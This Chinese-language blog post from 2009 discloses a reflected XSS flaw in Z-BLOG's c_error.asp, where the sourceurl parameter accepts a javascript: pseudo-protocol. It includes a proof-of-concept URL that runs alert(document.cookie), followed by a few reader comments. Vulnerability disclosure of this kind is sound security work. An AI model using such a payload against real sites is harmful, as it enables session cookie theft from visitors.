Z-BLOG XSS Vulnerabilities | WoYiGui's BloG

首页 > 网络安全 > Z-BLOG XSS Vulnerabilities

Z-BLOG XSS Vulnerabilities

2009年6月12日发表评论阅读评论

漏洞描述：
Z-BLOG后台登陆错误信息显示文件c_error.asp，虽然对跳转URL的参数sourceurl进行了编码，但没有判断链接头部，执行了javascript伪协议，造成跨站脚本漏洞。
漏洞测试：

http://www.woyigui.cn/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)

转载请注明：woyigui's blog [http://www.woyigui.cn/]
本文标题：Z-BLOG XSS Vulnerabilities
本文地址：http://www.woyigui.cn/2009/06/12/Z-BLOG-XSS-Vulnerabilities/

woyigui 分类: 网络安全标签: xss

评论 (3) Trackbacks (0) 发表评论 Trackback

hysia

2009年6月13日11:16 | #1

回复 | 引用

你的修复了？
测试没弹出 cookies

[回复]
eee

2009年6月16日10:05 | #2

回复 | 引用

咳我以为是..

[回复]
星空泪

2009年6月18日12:22 | #3

回复 | 引用

hysia真是傻的可爱……woyigui的博客是bo-blog吧……

[回复]

本文目前尚无任何 trackbacks 和 pingbacks.

收麦娄热的快爆了